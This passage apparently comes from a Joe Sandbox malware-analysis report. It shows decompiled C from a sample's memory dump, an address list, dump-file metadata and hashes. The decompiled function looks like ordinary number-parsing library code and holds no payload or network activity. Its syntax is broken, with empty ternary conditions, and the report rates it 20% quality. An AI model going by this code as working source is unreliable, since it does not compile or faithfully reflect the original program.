															E01464F90( &_v52);
															_t637 = _v52;
															_t679 = _t679 - 0x10;
														}
														 *((char*)(_t637 + _t575)) = _v76 & 0x000000ff;
														_v48 = _v64;
														 *((char*)(_v52 + _t575 + 1)) = 0;
														_v140 =  &_v52;
														_v144 =  *(_t666 + 0xc);
														 *_t679 =  *(_t666 + 8);
														_t461 = E01473040();
														__eflags = _t461;
														if(_t461 == 0) {
															 *_a24 = 4;
														}
														__eflags = _v72;
														if(_v72 != 0) {
															L96:
															_t449 = _v52;
															L97:
															__eflags = _v88;
															if(_v88 != 0) {
																goto L65;
															}
															__eflags = _v96;
															if(_v96 == 0) {
																_t671 = _v92;
																__eflags = _v102;
																_t641 =  ==  ? _t671 :  ~_t671;
																 *_a28 =  ==  ? _t671 :  ~_t671;
															} else {
																 *_a28 = 0xffffffff;
																 *_a24 = 4;
															}
															goto L66;
														} else {
															__eflags = _v80 | _v48;
															if((_v80 | _v48) == 0) {
																_t449 = _v52;
																L65:
																 *_a28 = 0;
																 *_a24 = 4;
																L66:
																if(_v101 != 0) {
																	 *_a24 =  *_a24 | 0x00000002;
																}
																if(_t449 !=  &_v44) {
																	 *_t679 = _t449;
																	L01477910();
																}
																return _t675;
															}
															goto L96;
														}
													}
													L63:
													if(_v72 == 1 || _v80 != 0) {
														goto L97;
													} else {
														goto L65;
													}
												}
												_v92 = 0;
												_v101 = (_v108 & 0x000000ff) + 0x30;
												while(1) {
													_t648 = _t574;
													if(_v108 > 0xa) {
														goto L86;
													}
													if(_t574 <= 0x2f || _t574 >= _v101) {
														L89:
														_t449 = _v52;
														_t575 = _v48;
														_v101 = 0;
														_t637 = _t449;
														__eflags = _t575;
														if(_t575 == 0) {
															goto L63;
														}
														goto L90;
													} else {
														L52:
														_t117 = _t648 - 0x30; // -48
														_t499 = _t117;
														L53:
														_t609 = _v92;
														_t731 = _v100 - _t609;
														if(_t731 < 0) {
															_t500 =  *(_t675 + 8);
															_t649 =  *(_t675 + 0xc);
															_v96 = 1;
															__eflags = _t500 - _t649;
															if(_t500 < _t649) {
																L55:
																_t501 = _t500 + 1;
																 *(_t675 + 8) = _t501;
																L56:
																if(_t501 >= _t649) {
																	_t503 =  *((intOrPtr*)( *_t675 + 0x24))();
																	__eflags = _t503 - 0xffffffff;
																	if(_t503 != 0xffffffff) {
																		goto L57;
																	}
																	_v68 = 1;
																	_t675 = 0;
																	L58:
																	_t582 = (_t574 & 0xffffff00 | _v76 != 0x00000000) & _v64;
																	if(_t582 != 0) {
																		_t505 = _v76;
																		__eflags =  *((intOrPtr*)(_t505 + 8)) -  *((intOrPtr*)(_t505 + 0xc));
																		if( *((intOrPtr*)(_t505 + 8)) >=  *((intOrPtr*)(_t505 + 0xc))) {
																			__eflags =  *((intOrPtr*)( *_t505 + 0x24))() - 0xffffffff;
																			_t583 =  !=  ? 0 : _t582;
																			_t510 =  !=  ? _v76 : 0;
																			_v76 =  !=  ? _v76 : 0;
																		} else {
																			_t583 = 0;
																		}
																	} else {
																		_t583 = _v64 & 0x000000ff;
																	}
																	if(_t583 != _v68) {
																		__eflags = _t675;
																		if(_t675 == 0) {
																			L145:
																			_t574 = 0xffffffff;
																			_t675 = 0;
																			__eflags = 0;
																			L146:
																			_v68 = 0xffffffff;
																			continue;
																		}
																		_t511 =  *(_t675 + 8);
																		__eflags = _t511 -  *(_t675 + 0xc);
																		if(_t511 >=  *(_t675 + 0xc)) {
																			_t513 =  *((intOrPtr*)( *_t675 + 0x24))();
																			_t574 = _t513;
																			__eflags = _t513 - 0xffffffff;
																			if(_t513 != 0xffffffff) {
																				goto L146;
																			}
																			goto L145;
																		}
																		_t574 =  *_t511 & 0x000000ff;
																		goto L146;
																	}
																	_t575 = _v48;
																	_t449 = _v52;
																	_v68 = 0xffffffff;
																	_v101 = 1;
																	goto L62;
																}
																L57:
																_v68 = 0;
																goto L58;
															}
															L101:
															 *((intOrPtr*)( *_t675 + 0x28))();
															_t501 =  *(_t675 + 8);
															_t649 =  *(_t675 + 0xc);
															goto L56;
														}
														_t574 = _v84;
														_v92 = _t499 + _t609 * _t574;
														_t500 =  *(_t675 + 8);
														_v96 = _v96 | _t648 & 0xffffff00 | _t731 > 0x00000000;
														_t649 =  *(_t675 + 0xc);
														_v80 = _v80 + 1;
														if(_t500 >= _t649) {
															goto L101;
														}
														goto L55;
													}
													L86:
													_t176 = _t574 - 0x30; // 0xcf
													__eflags = _t176 - 9;
													if(_t176 <= 9) {
														goto L52;
													}
													_t177 = _t574 - 0x61; // 0x9e
													__eflags = _t177 - 5;
													if(_t177 > 5) {
														_t574 = _t574 - 0x41;
														__eflags = _t574 - 5;
														if(_t574 > 5) {
															goto L89;
														}
														_t227 = _t648 - 0x37; // -55
														_t499 = _t227;
														goto L53;
													}
													_t178 = _t648 - 0x57; // -87
													_t499 = _t178;
													__eflags = _t648 - 0x56;
													if(_t648 != 0x56) {
														goto L53;
													}
													goto L89;
												}
											}
										}
										L44:
										_t518 = _v84;
										_v112 = _t518;
										_v108 = _t518;
										goto L45;
									}
								}
								_t545 = _v88;
								_t545 = _v68 - 8;
								_t623 = _t616 & 0xffffff00 | _t545 == 0x00000000 | _t545 & 0xffffff00 | _v68 == 0x00000008;
								__eflags = _t623;
								_v72 = _t623;
								if(_t623 == 0) {
									_v80 = _v80 + 1;
									_v72 = _t634;
									goto L36;
								}
								_t526 =  *(_t675 + 8);
								_t653 =  *(_t675 + 0xc);
								_v80 = 0;
								_v68 = 8;
								__eflags = _t526 - _t653;
								if(_t526 < _t653) {
									goto L37;
								}
								goto L77;
							}
							if(_v72 == 0) {
								break;
							}
							goto L32;
						}
						_v88 = 0;
						_v68 = _t616;
						_v84 = _v68;
						__eflags = _v84 - 0x10;
						if(_v84 != 0x10) {
							goto L44;
						}
						goto L137;
					}
				}
			}

0x01409446
0x01409449
0x0140944c
0x01409452
0x01409455
0x01409458
0x0140945b
0x01409463
0x01409466
0x01409469
0x0140946c
0x0140946f
0x01409476
0x0140947f
0x01409482
0x01409484
0x01409489
0x01409ca7
0x01409cac
0x01409cb3
0x01409cb5
0x01409cbd
0x01409cc4
0x01409ccb
0x01409ccf
0x01409cd6
0x01409cdd
0x01409ce4
0x01409cf2
0x01409cf6
0x01409cfd
0x01409d00
0x01409d0e
0x01409d11
0x01409d15
0x01409d1d
0x01409d20
0x01409d20
0x01409492
0x01409499
0x0140949c
0x014094a2
0x014094b2
0x014094b5
0x014094b5
0x014094bf
0x014094cc
0x014094ce
0x01409d60
0x01409d66
0x01409d69
0x01409faa
0x01409fb2
0x01409fb6
0x01409d6f
0x01409d6f
0x01409d6f
0x014094d4
0x014094d4
0x014094d4
0x014094df
0x014094ec
0x014094ee
0x01409d80
0x01409d86
0x01409d89
0x01409f79
0x01409f83
0x01409f8b
0x01409f8f
0x01409f97
0x01409d8f
0x01409d8f
0x01409d8f
0x014094f4
0x014094f4
0x014094f4
0x014094fa
0x01409bf0
0x01409bf4
0x01409bf6
0x01409bfa
0x01409c01
0x00000000
0x01409500
0x01409502
0x01409c89
0x01409c8c
0x01409c8f
0x01409fef
0x01409ff2
0x01409ffc
0x0140a004
0x01409c95
0x01409c95
0x01409c95
0x0140950e
0x0140950e
0x0140950e
0x01409515
0x01409519
0x01409519
0x0140951d
0x0140952a
0x014097b0
0x014097b3
0x00000000
0x00000000
0x00000000
0x014097b9
0x01409530
0x01409533
0x00000000
0x00000000
0x01409535
0x01409538
0x0140953d
0x01409f03
0x01409f06
0x01409f09
0x01409543
0x01409543
0x01409546
0x01409546
0x0140954b
0x01409e95
0x01409e98
0x01409e9b
0x00000000
0x00000000
0x01409ea1
0x01409ea5
0x00000000
0x01409551
0x01409551
0x01409551
0x01409555
0x0140955d
0x01409560
0x01409ee9
0x01409eef
0x01409ef2
0x0140a010
0x0140a01a
0x0140a022
0x0140a026
0x0140a02e
0x01409ef8
0x01409ef8
0x01409ef8
0x01409566
0x01409566
0x01409566
0x0140956d
0x01409eb0
0x01409eb7
0x01409ebb
0x01409ec2
0x00000000
0x01409573
0x01409575
0x01409edd
0x01409edd
0x01409ee2
0x0140958a
0x0140958a
0x01409591
0x00000000
0x01409591
0x0140957b
0x01409581
0x01409ecf
0x01409ed2
0x01409ed4
0x01409ed7
0x00000000
0x00000000
0x00000000
0x01409587
0x01409587
0x00000000
0x01409587
0x01409581
0x0140956d
0x01409c80
0x01409c80
0x01409595
0x01409595
0x01409598
0x0140959b
0x014095a2
0x014095a6
0x014095a9
0x014095b9
0x00000000
0x00000000
0x014095c2
0x014097c7
0x014097ce
0x014097ce
0x014097d0
0x014095d2
0x014095d5
0x014095ef
0x014095f1
0x01409e14
0x01409e1a
0x01409e1e
0x01409e21
0x00000000
0x01409e21
0x014095f7
0x014095fe
0x01409602
0x01409609
0x01409609
0x0140960c
0x01409611
0x01409810
0x01409814
0x0140981d
0x0140981f
0x01409625
0x01409625
0x01409629
0x01409631
0x01409634
0x01409980
0x01409986
0x01409989
0x01409d34
0x01409d3e
0x01409d46
0x01409d4a
0x01409d52
0x0140998f
0x0140998f
0x0140998f
0x0140963a
0x0140963a
0x0140963a
0x01409641
0x01409848
0x0140984a
0x014099d0
0x014099d0
0x014099d5
0x0140985f
0x0140985f
0x01409863
0x01409e36
0x01409e3a
0x01409e41
0x00000000
0x01409e41
0x01409869
0x0140986d
0x00000000
0x0140986d
0x01409850
0x01409853
0x01409856
0x014099c0
0x014099c3
0x014099c5
0x014099c8
0x00000000
0x00000000
0x00000000
0x014099c8
0x0140985c
0x00000000
0x01409647
0x0140964a
0x0140964e
0x01409655
0x00000000
0x01409655
0x01409641
0x01409828
0x0140982c
0x0140982f
0x01409832
0x00000000
0x00000000
0x01409838
0x0140983c
0x00000000
0x0140983c
0x01409617
0x01409617
0x0140961a
0x0140961f
0x00000000
0x00000000
0x00000000
0x01409dd0
0x01409dd3
0x01409dd7
0x01409dda
0x01409ddd
0x01409658
0x0140965c
0x01409b47
0x01409b47
0x01409b4e
0x0140966b
0x01409672
0x01409679
0x0140967c
0x01409680
0x01409bd8
0x01409be2
0x01409be7
0x01409be7
0x01409690
0x01409693
0x01409697
0x0140969c
0x01409a28
0x01409a2c
0x01409fc2
0x01409fc5
0x01409fcc
0x01409fd0
0x01409fd3
0x01409fd6
0x00000000
0x01409fd6
0x01409a32
0x01409a35
0x01409a39
0x01409a3c
0x01409a43
0x01409a43
0x01409a47
0x01409a49
0x00000000
0x00000000
0x01409a4b
0x01409a4e
0x01409b60
0x01409b63
0x01409b67
0x01409b6a
0x01409b6c
0x01409fdf
0x01409fe3
0x00000000
0x01409fe3
0x01409b72
0x01409b75
0x01409b7b
0x01409b7d
0x01409e29
0x01409b83
0x01409b83
0x01409b83
0x01409b89
0x01409b8b
0x01409da0
0x01409dab
0x01409db3
0x01409dbb
0x01409dbe
0x01409dc3
0x01409dc6
0x01409dc6
0x01409b95
0x01409b9c
0x01409b9f
0x01409ba5
0x01409ba8
0x01409aa6
0x01409aa6
0x01409aa9
0x01409aac
0x01409aae
0x01409b01
0x01409b05
0x01409b08
0x01409b0b
0x01409ab6
0x01409ab6
0x01409ab8
0x01409f38
0x01409f3b
0x01409f3e
0x00000000
0x00000000
0x01409f48
0x01409f4a
0x01409ac2
0x01409ac5
0x01409aca
0x01409aca
0x01409acd
0x01409c10
0x01409c16
0x01409c19
0x01409f18
0x01409f20
0x01409f28
0x01409f2c
0x01409c1f
0x01409c1f
0x01409c1f
0x01409ad3
0x01409ad3
0x01409ad3
0x01409ad7
0x01409ada
0x01409b10
0x01409b12
0x01409c38
0x01409c38
0x01409c3d
0x01409c3d
0x01409c3f
0x01409c3f
0x00000000
0x01409c3f
0x01409b18
0x01409b1b
0x01409b1e
0x01409c2a
0x01409c2d
0x01409c2f
0x01409c32
0x00000000
0x00000000
0x00000000
0x01409c32
0x01409b24
0x00000000
0x01409adc
0x01409adc
0x01409adf
0x01409ae2
0x00000000
0x01409ae2
0x01409ada
0x01409abe
0x01409abe
0x00000000
0x01409abe
0x01409ab0
0x01409ab0
0x01409ab0
0x01409ab3
0x00000000
0x01409ab3
0x01409a54
0x01409a54
0x01409a57
0x00000000
0x00000000
0x01409a63
0x01409a67
0x01409a6b
0x01409a6e
0x01409a71
0x01409a76
0x01409a78
0x00000000
0x00000000
0x01409a7e
0x01409a80
0x01409a83
0x01409a83
0x01409a86
0x01409a89
0x01409a8c
0x01409a8f
0x01409af4
0x01409af7
0x01409afa
0x01409afd
0x01409aff
0x00000000
0x00000000
0x00000000
0x01409aff
0x01409a91
0x01409a9c
0x01409aa0
0x01409aa0
0x01409aa0
0x01409aa3
0x00000000
0x01409aa3
0x014096a2
0x014096a6
0x014096aa
0x01409f5c
0x01409f5f
0x01409f63
0x01409f6a
0x01409f6d
0x01409753
0x01409753
0x01409757
0x014098b6
0x014098ba
0x014098bd
0x014098c0
0x014098c6
0x014098c8
0x01409e49
0x014098ce
0x014098ce
0x014098ce
0x014098d4
0x014098d6
0x01409de6
0x01409df1
0x01409df9
0x01409e01
0x01409e04
0x01409e09
0x01409e0c
0x01409e0c
0x014098e0
0x014098e6
0x014098ec
0x014098f4
0x014098fb
0x01409902
0x01409905
0x0140990a
0x0140990c
0x01409c73
0x01409c73
0x01409912
0x01409916
0x01409924
0x01409924
0x01409927
0x01409927
0x0140992b
0x00000000
0x00000000
0x01409931
0x01409935
0x01409c50
0x01409c57
0x01409c5b
0x01409c61
0x0140993b
0x0140993e
0x01409947
0x01409947
0x00000000
0x01409918
0x0140991b
0x0140991e
0x0140a036
0x01409772
0x01409778
0x0140977e
0x01409784
0x01409788
0x0140978d
0x0140978d
0x01409795
0x01409797
0x0140979a
0x0140979a
0x014097ab
0x014097ab
0x00000000
0x0140991e
0x01409916
0x0140975d
0x01409761
0x00000000
0x00000000
0x00000000
0x00000000
0x01409761
0x014096b4
0x014096be
0x014096c1
0x014096c5
0x014096c8
0x00000000
0x00000000
0x014096d1
0x014098a2
0x014098a2
0x014098a5
0x014098a8
0x014098ac
0x014098ae
0x014098b0
0x00000000
0x00000000
0x00000000
0x014096e0
0x014096e0
0x014096e0
0x014096e0
0x014096e3
0x014096e3
0x014096e6
0x014096e9
0x01409958
0x0140995b
0x0140995e
0x01409962
0x01409964
0x01409712
0x01409712
0x01409715
0x01409718
0x0140971a
0x01409e7a
0x01409e7d
0x01409e80
0x00000000
0x00000000
0x01409e86
0x01409e8a
0x01409724
0x0140972c
0x0140972f
0x014099f0
0x014099f6
0x014099f9
0x01409e5a
0x01409e62
0x01409e6a
0x01409e6e
0x014099ff
0x014099ff
0x014099ff
0x01409735
0x01409735
0x01409735
0x0140973c
0x014099a0
0x014099a2
0x01409bc0
0x01409bc0
0x01409bc5
0x01409bc5
0x01409bc7
0x01409bc7
0x00000000
0x01409bc7
0x014099a8
0x014099ab
0x014099ae
0x01409bb5
0x01409bb8
0x01409bba
0x01409bbd
0x00000000
0x00000000
0x00000000
0x01409bbd
0x014099b4
0x00000000
0x014099b4
0x01409742
0x01409745
0x01409748
0x0140974f
0x00000000
0x0140974f
0x01409720
0x01409720
0x00000000
0x01409720
0x0140996a
0x0140996e
0x01409971
0x01409974
0x00000000
0x01409974
0x014096ef
0x014096fa
0x014096fd
0x01409700
0x01409703
0x01409706
0x0140970c
0x00000000
0x00000000
0x00000000
0x0140970c
0x01409880
0x01409880
0x01409883
0x01409885
0x00000000
0x00000000
0x0140988b
0x0140988e
0x01409890
0x01409a10
0x01409a13
0x01409a16
0x00000000
0x00000000
0x01409a1c
0x01409a1c
0x00000000
0x01409a1c
0x01409896
0x01409896
0x01409899
0x0140989c
0x00000000
0x00000000
0x00000000
0x0140989c
0x014096c1
0x0140969c
0x01409662
0x01409662
0x01409665
0x01409668
0x00000000
0x01409668
0x014095d5
0x014097d6
0x014097de
0x014097e5
0x014097e5
0x014097e7
0x014097ea
0x014099e0
0x014099e4
0x00000000
0x014099e4
0x014097f0
0x014097f3
0x014097f6
0x014097fd
0x01409804
0x01409806
0x00000000
0x00000000
0x00000000
0x01409806
0x014095cc
0x00000000
0x00000000
0x00000000
0x014095cc
0x01409b33
0x01409b37
0x01409b3a
0x01409b3d
0x01409b41
0x00000000
0x00000000
0x00000000
0x01409b41
0x0140951d

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2b82c9ce39d7e1681eb7aa8ecd6d096c72a31231b564dc75ab6b55fc35371e
Instruction ID: 8ec1a72be437d3f805b6f346a88fcf5b30946a8c6b6e7dff1ee2773b40587b9d
Opcode Fuzzy Hash: cf2b82c9ce39d7e1681eb7aa8ecd6d096c72a31231b564dc75ab6b55fc35371e
Instruction Fuzzy Hash: 96726070E04299CFDB12CFAAC49479DBFF1AF45314F18866AD4A9AB3E2C3759845CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01407B80 Relevance: 2.0, APIs: 1, Instructions: 789
COMMONCrypto

Download Yara Rule

C-Code - Quality: 20%

			E01407B80(void* __eflags, signed int _a4, signed int _a8, signed char _a12, signed int _a16, signed int _a20, signed int* _a24, signed int* _a28) {
				void* _v16;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v101;
				char _v102;
				signed int _v108;
				signed char _v112;
				signed char _v136;
				signed int _v140;
				signed int _v144;
				signed int _t417;
				signed int _t418;
				signed int _t421;
				intOrPtr* _t422;
				signed int _t430;
				signed char _t432;
				intOrPtr* _t437;
				signed int _t447;
				signed int _t449;
				char _t453;
				signed int _t461;
				signed int _t468;
				void* _t469;
				void* _t470;
				signed int _t472;
				signed int _t473;
				void* _t475;
				signed char _t476;
				char _t484;
				signed char* _t490;
				signed int _t492;
				void* _t499;
				signed int _t500;
				signed int _t501;
				void* _t503;
				signed char _t505;
				signed char* _t511;
				signed int _t513;
				signed char _t518;
				signed int _t519;
				signed char _t524;
				signed int _t526;
				signed char _t530;
				signed char* _t537;
				signed int _t539;
				void* _t542;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed int _t550;
				void* _t552;
				signed char _t554;
				signed char* _t560;
				signed int _t562;
				signed char* _t563;
				void* _t565;
				signed int _t570;
				signed char _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t577;
				signed int _t579;
				signed int _t580;
				signed char _t582;
				signed int _t583;
				signed char _t585;
				signed int _t598;
				signed int _t603;
				signed int _t605;
				signed int _t609;
				signed int _t616;
				signed char _t623;
				signed char _t632;
				signed int _t634;
				signed int _t637;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t648;
				signed int _t649;
				signed int _t653;
				signed char _t657;
				signed int _t659;
				signed char _t661;
				void* _t666;
				signed int _t667;
				signed int _t671;
				signed int _t675;
				void* _t678;
				signed int* _t679;
				void* _t731;

				_t679 = _t678 - 0x7c;
				_t585 = _a12;
				_t417 = _a8;
				_t675 = _a4;
				_v92 = _t585;
				_t570 = _a20;
				_v76 = _t585;
				_v96 = _a16;
				_v64 = _t675;
				_v80 = _t417;
				_v68 = _t417;
				_t418 = E013F0230(0x14a4808);
				_v72 = _t418;
				_t421 =  *((intOrPtr*)( *((intOrPtr*)(_t570 + 0x6c)) + 0xc)) + _t418 * 4;
				_t666 =  *_t421;
				_v84 = _t421;
				if(_t666 == 0) {
					_t422 = E01477960(0x68);
					 *(_t422 + 4) = 0;
					_t667 = _t422;
					 *_t422 = 0x14b1c70;
					 *(_t422 + 8) = 0;
					 *(_t422 + 0xc) = 0;
					 *((char*)(_t422 + 0x10)) = 0;
					 *(_t422 + 0x14) = 0;
					 *(_t422 + 0x18) = 0;
					 *(_t422 + 0x1c) = 0;
					 *(_t422 + 0x20) = 0;
					 *((char*)(_t667 + 0x64)) = 0;
					 *((short*)(_t667 + 0x24)) =  *0x14a8a04 & 0x0000ffff;
					_v140 = _t570 + 0x6c;
					E014590A0(_t667, __eflags);
					_v144 = _t667;
					_v140 = _v72;
					E0145F340( *((intOrPtr*)(_t570 + 0x6c)));
					_t679 = _t679 - 0xfffffffffffffffc;
					_t666 =  *_v84;
				}
				_v84 = 8;
				_t430 =  *(_t570 + 0xc) & 0x0000004a;
				_v88 = _t430;
				if(_t430 != 0x40) {
					_t569 =  ==  ? 0x10 : 0xa;
					_v84 =  ==  ? 0x10 : 0xa;
				}
				_v72 = _v80 == 0xffffffff;
				_t572 = (_t570 & 0xffffff00 | _v64 != 0x00000000) & _v72 & 0x000000ff;
				if(_t572 != 0) {
					_t432 = _v64;
					__eflags =  *((intOrPtr*)(_t432 + 8)) -  *((intOrPtr*)(_t432 + 0xc));
					if( *((intOrPtr*)(_t432 + 8)) >=  *((intOrPtr*)(_t432 + 0xc))) {
						__eflags =  *((intOrPtr*)( *_t432 + 0x24))() - 0xffffffff;
						_t675 =  !=  ? _v64 : 0;
						_t573 =  !=  ? 0 : _t572;
					} else {
						_t573 = 0;
					}
				} else {
					_t573 = _v72 & 0x000000ff;
				}
				_v64 = _v96 == 0xffffffff;
				_t632 = (_v92 & 0xffffff00 | _v92 != 0x00000000) & _v64 & 0x000000ff;
				if(_t632 != 0) {
					_t437 = _v92;
					__eflags =  *((intOrPtr*)(_t437 + 8)) -  *((intOrPtr*)(_t437 + 0xc));
					if( *((intOrPtr*)(_t437 + 8)) >=  *((intOrPtr*)(_t437 + 0xc))) {
						_v96 = _t632;
						__eflags =  *((intOrPtr*)( *_t437 + 0x24))() - 0xffffffff;
						_t441 =  !=  ? _v92 : 0;
						_v76 =  !=  ? _v92 : 0;
						_t634 =  !=  ? 0 : _v96 & 0x000000ff;
					} else {
						_t634 = 0;
					}
				} else {
					_t634 = _v64 & 0x000000ff;
				}
				if(_t634 == _t573) {
					_v102 = 0;
					_t574 = 0;
					_v88 = 1;
					_v80 = 0;
					_v72 = 0;
					goto L43;
				} else {
					if(_t675 != 0 && _v72 != 0) {
						_t563 =  *(_t675 + 8);
						__eflags = _t563 -  *(_t675 + 0xc);
						if(_t563 >=  *(_t675 + 0xc)) {
							_t565 =  *((intOrPtr*)( *_t675 + 0x24))();
							__eflags = _t565 - 0xffffffff;
							_t574 =  ==  ? 0xffffffff : _t565;
							_t675 =  ==  ? 0 : _t675;
						} else {
							_t574 =  *_t563 & 0x000000ff;
						}
					} else {
						_t574 = _v80 & 0x000000ff;
					}
					_t519 =  *(_t666 + 0x10) & 0x000000ff;
					_t41 =  &_v102;
					 *_t41 =  *((intOrPtr*)(_t666 + 0x4a)) == _t574;
					if( *_t41 == 0 ||  *((intOrPtr*)(_t666 + 0x4b)) == _t574) {
						if(_t519 != 0) {
							__eflags =  *((intOrPtr*)(_t666 + 0x25)) - _t574;
							if( *((intOrPtr*)(_t666 + 0x25)) != _t574) {
								goto L14;
							}
							goto L26;
						}
						L14:
						if( *((intOrPtr*)(_t666 + 0x24)) == _t574) {
							goto L26;
						}
						_t547 =  *(_t675 + 8);
						_t659 =  *(_t675 + 0xc);
						if(_t547 >= _t659) {
							 *((intOrPtr*)( *_t675 + 0x28))();
							_t550 =  *(_t675 + 8);
							_t659 =  *(_t675 + 0xc);
						} else {
							_t550 = _t547 + 1;
							 *(_t675 + 8) = _t550;
						}
						if(_t550 >= _t659) {
							_t552 =  *((intOrPtr*)( *_t675 + 0x24))();
							__eflags = _t552 - 0xffffffff;
							if(_t552 != 0xffffffff) {
								goto L18;
							}
							_v68 = 1;
							_t675 = 0;
							goto L19;
						} else {
							L18:
							_v68 = 0;
							L19:
							_t661 = (_t659 & 0xffffff00 | _v76 != 0x00000000) & _v64;
							if(_t661 != 0) {
								_t554 = _v76;
								__eflags =  *((intOrPtr*)(_t554 + 8)) -  *((intOrPtr*)(_t554 + 0xc));
								if( *((intOrPtr*)(_t554 + 8)) >=  *((intOrPtr*)(_t554 + 0xc))) {
									_v72 = _t661;
									__eflags =  *((intOrPtr*)( *_t554 + 0x24))() - 0xffffffff;
									_t558 =  !=  ? _v76 : 0;
									_v76 =  !=  ? _v76 : 0;
									_t634 =  !=  ? 0 : _v72 & 0x000000ff;
								} else {
									_t634 = 0;
								}
							} else {
								_t634 = _v64 & 0x000000ff;
							}
							if(_v68 == _t634) {
								_v68 = 0xffffffff;
								_v88 = 1;
								_v80 = 0;
								_v72 = 0;
								goto L43;
							} else {
								if(_t675 == 0) {
									L180:
									_t574 = 0xffffffff;
									_t675 = 0;
									L25:
									_v68 = 0xffffffff;
									_t519 =  *(_t666 + 0x10) & 0x000000ff;
									goto L26;
								}
								_t560 =  *(_t675 + 8);
								if(_t560 >=  *(_t675 + 0xc)) {
									_t562 =  *((intOrPtr*)( *_t675 + 0x24))();
									_t574 = _t562;
									__eflags = _t562 - 0xffffffff;
									if(_t562 != 0xffffffff) {
										goto L25;
									}
									goto L180;
								} else {
									_t574 =  *_t560 & 0x000000ff;
									goto L25;
								}
							}
						}
					} else {
						_v102 = 0;
						L26:
						_t634 = _v84;
						_t616 = _v68;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t634;
						while(_t519 == 0 ||  *((intOrPtr*)(_t666 + 0x25)) != _t574) {
							if( *((intOrPtr*)(_t666 + 0x24)) == _t574) {
								break;
							}
							if( *(_t666 + 0x4e) == _t574) {
								__eflags = _v68 - 0xa;
								_t634 = _v72 & 0x000000ff ^ 0x00000001 | _t519 & 0xffffff00 | _v68 == 0x0000000a;
								__eflags = _t634;
								if(_t634 == 0) {
									L32:
									if( *((intOrPtr*)(_t666 + 0x4c)) == _t574 ||  *((intOrPtr*)(_t666 + 0x4d)) == _t574) {
										_t524 = _v88 & 0xffffff00 | _v88 == 0x00000000 | _t634;
										if(_t524 == 0) {
											_v88 = _t524;
											_v72 = 1;
											_v84 = _v68;
											_v68 = _t616;
											goto L44;
										}
										_v80 = 0;
										_v72 = 0;
										_v68 = 0x10;
										L36:
										_t526 =  *(_t675 + 8);
										_t653 =  *(_t675 + 0xc);
										if(_t526 >= _t653) {
											L77:
											 *((intOrPtr*)( *_t675 + 0x28))();
											__eflags =  *(_t675 + 8) -  *(_t675 + 0xc);
											if( *(_t675 + 8) <  *(_t675 + 0xc)) {
												L38:
												_v84 = 0;
												L39:
												_t657 = (_v76 & 0xffffff00 | _v76 != 0x00000000) & _v64;
												if(_t657 != 0) {
													_t530 = _v76;
													__eflags =  *((intOrPtr*)(_t530 + 8)) -  *((intOrPtr*)(_t530 + 0xc));
													if( *((intOrPtr*)(_t530 + 8)) >=  *((intOrPtr*)(_t530 + 0xc))) {
														_v92 = _t657;
														__eflags =  *((intOrPtr*)( *_t530 + 0x24))() - 0xffffffff;
														_t534 =  !=  ? _v76 : 0;
														_v76 =  !=  ? _v76 : 0;
														_t634 =  !=  ? 0 : _v92 & 0x000000ff;
													} else {
														_t634 = 0;
													}
												} else {
													_t634 = _v64 & 0x000000ff;
												}
												if(_v84 != _t634) {
													__eflags = _t675;
													if(_t675 == 0) {
														L109:
														_t574 = 0xffffffff;
														_t675 = 0;
														L84:
														__eflags = _v72;
														if(_v72 == 0) {
															_v88 = 0;
															_v68 = 0xffffffff;
															_v84 = _v68;
															goto L43;
														}
														_t519 =  *(_t666 + 0x10) & 0x000000ff;
														_t616 = 0xffffffff;
														continue;
													}
													_t537 =  *(_t675 + 8);
													__eflags = _t537 -  *(_t675 + 0xc);
													if(_t537 >=  *(_t675 + 0xc)) {
														_t539 =  *((intOrPtr*)( *_t675 + 0x24))();
														_t574 = _t539;
														__eflags = _t539 - 0xffffffff;
														if(_t539 != 0xffffffff) {
															goto L84;
														}
														goto L109;
													}
													_t574 =  *_t537 & 0x000000ff;
													goto L84;
												} else {
													_v88 = 1;
													_v68 = 0xffffffff;
													_v84 = _v68;
													goto L43;
												}
											}
											L79:
											_t542 =  *((intOrPtr*)( *_t675 + 0x24))();
											__eflags = _t542 - 0xffffffff;
											if(_t542 != 0xffffffff) {
												goto L38;
											}
											_v84 = 1;
											_t675 = 0;
											goto L39;
										}
										L37:
										_t543 = _t526 + 1;
										 *(_t675 + 8) = _t543;
										if(_t543 >= _t653) {
											goto L79;
										}
										goto L38;
									} else {
										_v88 = 0;
										_v68 = _t616;
										_v84 = _v68;
										_v72 = 1;
										L43:
										if(_v84 == 0x10) {
											L137:
											_v112 = 0x16;
											_v108 = 0x16;
											L45:
											_v48 = 0;
											_v52 =  &_v44;
											_v44 = 0;
											if( *(_t666 + 0x10) != 0) {
												 *_t679 = 0x20;
												E01464B20( &_v52, _t634);
												_t679 = _t679 - 4;
											}
											_v100 = 0xffffffff / _v84;
											_t447 =  *(_t666 + 0x64) & 0x000000ff;
											_v101 = _t447;
											if(_t447 != 0) {
												__eflags = _v88;
												if(_v88 != 0) {
													_t575 = _v48;
													_v92 = 0;
													_v96 = 0;
													_v101 = _v88 & 0x000000ff;
													_t449 = _v52;
